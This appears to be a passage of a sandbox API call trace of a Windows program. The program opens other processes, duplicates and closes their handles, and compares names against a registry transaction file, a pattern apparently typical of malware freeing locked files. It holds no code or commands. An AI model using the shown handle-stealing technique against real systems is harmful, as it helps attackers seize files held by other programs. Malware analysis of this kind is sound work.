1 [0155.098] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0155.098] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.099] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.099] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.099] CloseHandle (hObject=0x670) returned 1 [0155.099] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.099] CloseHandle (hObject=0x680) returned 1 [0155.099] CloseHandle (hObject=0x62c) returned 1 [0155.099] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0155.100] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.100] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.101] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.102] CloseHandle (hObject=0x670) returned 1 [0155.102] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.102] CloseHandle (hObject=0x680) returned 1 [0155.102] CloseHandle (hObject=0x62c) returned 1 [0155.102] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0155.102] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.103] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.104] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.104] CloseHandle (hObject=0x670) returned 1 [0155.104] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.104] CloseHandle (hObject=0x680) returned 1 [0155.104] CloseHandle (hObject=0x62c) returned 1 [0155.104] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0155.104] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.105] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.106] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.106] CloseHandle (hObject=0x670) returned 1 [0155.106] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.106] CloseHandle (hObject=0x680) returned 1 [0155.106] CloseHandle (hObject=0x62c) returned 1 [0155.106] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0155.106] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.107] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.107] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.107] CloseHandle (hObject=0x670) returned 1 [0155.107] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.107] CloseHandle (hObject=0x680) returned 1 [0155.108] CloseHandle (hObject=0x62c) returned 1 [0155.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0155.108] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.108] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.109] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.109] CloseHandle (hObject=0x670) returned 1 [0155.109] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.109] CloseHandle (hObject=0x680) returned 1 [0155.109] CloseHandle (hObject=0x62c) returned 1 [0155.109] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0155.109] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.110] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.111] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.111] CloseHandle (hObject=0x670) returned 1 [0155.111] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.111] CloseHandle (hObject=0x680) returned 1 [0155.111] CloseHandle (hObject=0x62c) returned 1 [0155.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0155.111] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.112] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.114] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.114] CloseHandle (hObject=0x670) returned 1 [0155.114] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.114] CloseHandle (hObject=0x680) returned 1 [0155.114] CloseHandle (hObject=0x62c) returned 1 [0155.114] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0155.114] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.115] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.116] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.116] CloseHandle (hObject=0x670) returned 1 [0155.116] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.116] CloseHandle (hObject=0x680) returned 1 [0155.116] CloseHandle (hObject=0x62c) returned 1 [0155.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0155.116] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.117] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.117] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.118] CloseHandle (hObject=0x670) returned 1 [0155.118] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.118] CloseHandle (hObject=0x680) returned 1 [0155.118] CloseHandle (hObject=0x62c) returned 1 [0155.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0155.118] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.119] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.119] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.119] CloseHandle (hObject=0x670) returned 1 [0155.119] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.119] CloseHandle (hObject=0x680) returned 1 [0155.119] CloseHandle (hObject=0x62c) returned 1 [0155.119] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0155.119] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.120] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.121] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.121] CloseHandle (hObject=0x670) returned 1 [0155.121] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.121] CloseHandle (hObject=0x680) returned 1 [0155.121] CloseHandle (hObject=0x62c) returned 1 [0155.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0155.121] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.122] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.122] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.123] CloseHandle (hObject=0x670) returned 1 [0155.123] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.123] CloseHandle (hObject=0x680) returned 1 [0155.123] CloseHandle (hObject=0x62c) returned 1 [0155.123] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0155.123] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.123] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.124] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.124] CloseHandle (hObject=0x670) returned 1 [0155.124] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -7 [0155.124] CloseHandle (hObject=0x680) returned 1 [0155.124] CloseHandle (hObject=0x62c) returned 1 [0155.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0155.124] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.126] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.126] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.126] CloseHandle (hObject=0x670) returned 1 [0155.127] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.127] CloseHandle (hObject=0x680) returned 1 [0155.127] CloseHandle (hObject=0x62c) returned 1 [0155.127] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0155.127] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.127] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.128] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.128] CloseHandle (hObject=0x670) returned 1 [0155.128] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0155.128] CloseHandle (hObject=0x680) returned 1 [0155.128] CloseHandle (hObject=0x62c) returned 1 [0155.128] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0155.128] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.129] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.130] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.130] CloseHandle (hObject=0x670) returned 1 [0155.130] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.130] CloseHandle (hObject=0x680) returned 1 [0155.130] CloseHandle (hObject=0x62c) returned 1 [0155.130] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0155.130] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.131] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.131] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.131] CloseHandle (hObject=0x670) returned 1 [0155.131] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.131] CloseHandle (hObject=0x680) returned 1 [0155.132] CloseHandle (hObject=0x62c) returned 1 [0155.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0155.132] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.132] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.134] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.135] CloseHandle (hObject=0x670) returned 1 [0155.135] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.135] CloseHandle (hObject=0x680) returned 1 [0155.135] CloseHandle (hObject=0x62c) returned 1 [0155.135] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0155.135] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.136] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.136] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.136] CloseHandle (hObject=0x670) returned 1 [0155.136] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.136] CloseHandle (hObject=0x680) returned 1 [0155.136] CloseHandle (hObject=0x62c) returned 1 [0155.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0155.137] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.137] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.138] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.138] CloseHandle (hObject=0x670) returned 1 [0155.138] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.138] CloseHandle (hObject=0x680) returned 1 [0155.138] CloseHandle (hObject=0x62c) returned 1 [0155.138] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0155.138] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.139] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.139] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.139] CloseHandle (hObject=0x670) returned 1 [0155.140] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0155.140] CloseHandle (hObject=0x680) returned 1 [0155.140] CloseHandle (hObject=0x62c) returned 1 [0155.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0155.140] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.141] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.141] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.141] CloseHandle (hObject=0x670) returned 1 [0155.141] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.141] CloseHandle (hObject=0x680) returned 1 [0155.141] CloseHandle (hObject=0x62c) returned 1 [0155.141] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0155.142] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.142] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.143] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.143] CloseHandle (hObject=0x670) returned 1 [0155.143] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.143] CloseHandle (hObject=0x680) returned 1 [0155.143] CloseHandle (hObject=0x62c) returned 1 [0155.143] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0155.143] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.144] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.144] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.144] CloseHandle (hObject=0x670) returned 1 [0155.144] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.144] CloseHandle (hObject=0x680) returned 1 [0155.144] CloseHandle (hObject=0x62c) returned 1 [0155.145] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 